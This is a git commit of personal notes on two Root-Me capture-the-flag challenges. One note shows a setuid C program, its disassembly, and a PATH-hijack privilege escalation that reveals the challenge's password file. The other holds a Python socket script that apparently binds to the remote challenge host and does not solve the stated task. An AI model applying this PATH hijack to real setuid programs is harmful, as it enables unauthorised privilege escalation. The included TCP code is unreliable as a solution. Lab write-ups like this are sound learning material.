commit a412c6432efabcad4c5a701eb2a986e7928495ee Author: Tuan-Dat Tran Date: Sat Mar 21 12:44:26 2026 +0100 init Signed-off-by: Tuan-Dat Tran diff --git a/app/bash-system-1/notes.org b/app/bash-system-1/notes.org new file mode 100644 index 0000000..7105ab2 --- /dev/null +++ b/app/bash-system-1/notes.org @@ -0,0 +1,91 @@ +* Bash - System 1 + +Challenge: https://www.root-me.org/de/Herausforderungen/App-Script/ELF32-System-1 + +Aufgabe +Quellcode: +#+begin_src C + #include + #include + #include + + int main(void) + { + setreuid(geteuid(), geteuid()); + system("ls /challenge/app-script/ch11/.passwd"); + return 0; + } +#+end_src + +Télécharger +Zugangsdaten für die Übung: +#+begin_quote +Host challenge02.root-me.org +Protokoll SSH +Port 2222 +Zugang per SSH ssh -p 2222 app-script-ch11@challenge02.root-me.org +Benutzername app-script-ch11 +Passwort app-script-ch11 +#+end_quote + +--- + +On the system is a ch11 binary which is the compiled version of the above program +Opening the compiled program in r2 we can see + +#+begin_src asm +$ r2 r ./ch11 +[0x0000058d]> aaaa +[0x0000058d]> afl +[0x0000058d]> s main +[0x0000058d]> pdf +/ 89: int main (char **argv); +| ; var int32_t var_ch @ ebp-0xc +| ; arg char **argv @ esp+0x34 +| 0x0000058d 8d4c2404 lea ecx, [argv] +| 0x00000591 83e4f0 and esp, 0xfffffff0 +| 0x00000594 ff71fc push dword [ecx - 4] +| 0x00000597 55 push ebp +| 0x00000598 89e5 mov ebp, esp +| 0x0000059a 56 push esi +| 0x0000059b 53 push ebx +| 0x0000059c 51 push ecx +| 0x0000059d 83ec0c sub esp, 0xc +| 0x000005a0 e8ebfeffff call sym.__x86.get_pc_thunk.bx +| 0x000005a5 81c32b1a0000 add ebx, 0x1a2b +| 0x000005ab e850feffff call sym.imp.geteuid ; uid_t geteuid(void) +| 0x000005b0 89c6 mov esi, eax +| 0x000005b2 e849feffff call sym.imp.geteuid ; uid_t geteuid(void) +| 0x000005b7 83ec08 sub esp, 8 +| 0x000005ba 56 push esi +| 0x000005bb 50 push eax +| 0x000005bc e85ffeffff call sym.imp.setreuid +| 0x000005c1 83c410 add esp, 0x10 +| 0x000005c4 83ec0c sub esp, 0xc +| 0x000005c7 8d83a0e6ffff lea eax, [ebx - 0x1960] +| 0x000005cd 50 push eax ; const char *string +| 0x000005ce e83dfeffff call sym.imp.system ; int system(const char *string) +| 0x000005d3 83c410 add esp, 0x10 +| 0x000005d6 b800000000 mov eax, 0 +| 0x000005db 8d65f4 lea esp, [var_ch] +| 0x000005de 59 pop ecx +| 0x000005df 5b pop ebx +| 0x000005e0 5e pop esi +| 0x000005e1 5d pop ebp +| 0x000005e2 8d61fc lea esp, [ecx - 4] +\ 0x000005e5 c3 ret +#+end_src + +--- + + +#+begin_src sh +app-script-ch11@challenge02:~$ cp /bin/cat /tmp/ls +app-script-ch11@challenge02:~$ ll /tmp/ +ls: cannot open directory '/tmp/': Permission denied +app-script-ch11@challenge02:~$ ls -lah /tmp/ +ls: cannot open directory '/tmp/': Permission denied +app-script-ch11@challenge02:~$ PATH="/tmp/" +app-script-ch11@challenge02:~$ ./ch11 +!oPe96a/.s8d5 +#+end_src diff --git a/programming/tcp-back-to-school/main.py b/programming/tcp-back-to-school/main.py new file mode 100644 index 0000000..ea9f165 --- /dev/null +++ b/programming/tcp-back-to-school/main.py @@ -0,0 +1,28 @@ +import socket +from threading import Thread + + +serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +host = "challenge01.root-me.org" +port = 52002 +serversocket.bind((host, port)) + + +class client(Thread): + def __init__(self, socket, address): + Thread.__init__(self) + self.sock = socket + self.addr = address + self.start() + + def run(self): + while 1: + print("Client sent:", self.sock.recv(1024).decode()) + self.sock.send(b"Oi you sent something to me") + + +serversocket.listen(5) +print("server started and listening") +while 1: + clientsocket, address = serversocket.accept() + client(clientsocket, address) diff --git a/programming/tcp-back-to-school/notes.org b/programming/tcp-back-to-school/notes.org new file mode 100644 index 0000000..7890251 --- /dev/null +++ b/programming/tcp-back-to-school/notes.org @@ -0,0 +1,55 @@ +* TCP - BAck to School + +Challenge: https://www.root-me.org/de/Herausforderungen/Programmierung/TCP-Back-to-school + +Aufgabe + +Um diesen Test mit dem TCP-Protokoll zu starten, müssen Sie eine Verbindung zu einem Programm an einem Netzwerk-Socket herstellen. + +- Berechne die Quadratwurzel aus Nummer 1 und multipliziere sie mit Nummer 2. +- Runden Sie dann das Ergebnis auf zwei Dezimalstellen ab. +- Sie haben 2 Sekunden Zeit, um die richtige Antwort zu senden, sobald das Programm Ihnen die Berechnung sendet. + +Zugangsdaten für die Übung + +Host challenge01.root-me.org +Protokoll TCP +Port 52002 + +--------- + +#+begin_src sh :results output +cat ./main.py +#+end_src + +#+RESULTS: +#+begin_example +import socket +from threading import Thread + + +serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +host = "challenge01.root-me.org" +port = 52002 +serversocket.bind((host, port)) + + +class client(Thread): + def __init__(self, socket, address): + Thread.__init__(self) + self.sock = socket + self.addr = address + self.start() + + def run(self): + while 1: + print("Client sent:", self.sock.recv(1024).decode()) + self.sock.send(b"Oi you sent something to me") + + +serversocket.listen(5) +print("server started and listening") +while 1: + clientsocket, address = serversocket.accept() + client(clientsocket, address) +#+end_example